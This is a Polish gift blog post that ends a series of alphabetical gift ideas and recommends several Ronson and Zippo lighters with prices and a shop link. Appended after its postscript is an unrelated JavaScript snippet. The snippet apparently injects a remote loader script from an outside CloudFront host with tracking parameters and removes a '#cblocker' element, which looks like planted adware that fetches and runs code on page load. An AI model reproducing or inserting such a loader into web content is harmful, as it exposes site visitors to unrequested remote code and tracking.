Prezentuję zakończenie cyklu prezentowe abecadło

15 maja 2012
Z jak …

Właściwie to Z jak zakończenie, ale zakończenie to żaden prezent, więc nie martwcie się – będzie też prawdziwy pomysł, ale zanim do niego przejdziemy małe podsumowanie cyklu prezentowe abecadło. Tak, jak pisałam wczoraj wymyślenie prezentów na wszystkie litery polskiego alfabetu nie było łatwe i muszę przyznać, że zabrało mi więcej czasu niż przypuszczałam. Mam nadzieję, że choć trochę się Wam podobał, bo pierwsze reakcje na sam pomysł takiej serii były raczej entuzjastyczne.

Na razie ciężko ocenić która litera alfabetu najbardziej się Wam spodobała, aczkolwiek najwięcej kliknięć i pozytywnych komentarzy odnotowały:
H jak pojazd dla małych i dużych,
 F jak ubranie dla szefa kuchni,
i literka A, która zaczynała ten cykl.


A teraz już do rzeczy czyli o dzisiejszym pomyśle na prezent. Co prawda nie pochwalam palenia i bardzo ucieszył mnie wprowadzony zakaz palenia w miejscach publicznych, to jestem sobie w stanie wyobrazić, że zapalniczka jest dla palacza ważnym drobiazgiem. Dlatego właśnie chciałabym Wam pokazać kilka ciekawych modeli tego gadżetu.

Zapalniczka Ronson Balerina HOT Pink – cena: 79 zł (http://www.yego.pl/)

Zapalniczka ZIPPO Police crime scene- cena: 144 zł (http://www.yego.pl/)

Zapalniczka ZIPPO One world one game – cena: 144 zł (http://www.yego.pl/)

Jak widać dla każdego znajdzie się pasująca do jego usposobienia i zainteresowań zapalniczka, a dla osób, które chcą podarować coś naprawdę wyjątkowego zawsze pozostaje opcja wygrawerowania czegoś na takim gadżecie.


P.S. Zdjęcia pochodzą ze strony http://www.yego.pl/

if(typeof(jQuery)==’undefined’){(function(){var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.src=’https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState==”loaded”||ccm.readyState==”complete”){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();}
function ccm_e_init(jc){if(jc){jQuery.noConflict();}
jQuery(function(){var http=location.href.indexOf(‘https://’)>-1?’https’:’http’;var ccm=document.createElement(‘script’);ccm.type=’text/javascript’;ccm.async=true;ccm.src=http+’://d1nfmblh2wz0fd.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=1063&zoneid=15220&cid=&rid=&ccid=&ip=’;var s=document.getElementsByTagName(‘script’)[0];s.parentNode.insertBefore(ccm,s);jQuery(‘#cblocker’).remove();});};

Tagi: ,

Kategoria: , , , , , , ,

Blog jest po przeprowadzce,

więc jeśli zauważysz jakieś błędy, których nie wychwyciłam, napisz proszę do mnie :)

kontakt@prezentujeprezenty.pl

Poprzedni

Prezentuję powiew egzotyki w kraju nad Wisłą

Następny

Prezentuję tydzień prezentów dla naszych Mam

Comments are closed here.